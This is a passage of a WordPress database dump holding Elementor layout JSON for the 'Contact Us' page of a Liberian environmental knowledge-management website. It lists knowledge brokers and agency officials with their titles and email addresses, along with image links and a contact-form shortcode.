":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19819,2419,'_jetpack_related_posts_cache','a:1:{s:32:\"e57a391bd08aeb2bc55e8f58d83c1121\";a:2:{s:7:\"expires\";i:1627584702;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:2411;}}}}'),(19820,2420,'_jetpack_related_posts_cache','a:1:{s:32:\"e57a391bd08aeb2bc55e8f58d83c1121\";a:2:{s:7:\"expires\";i:1627686317;s:7:\"payload\";a:0:{}}}'),(19821,2899,'_elementor_edit_mode','builder'),(19822,2899,'_elementor_template_type','wp-page'),(19823,2899,'_elementor_version','2.7.5'),(19824,2899,'_wp_page_template','default'),(19825,2899,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu 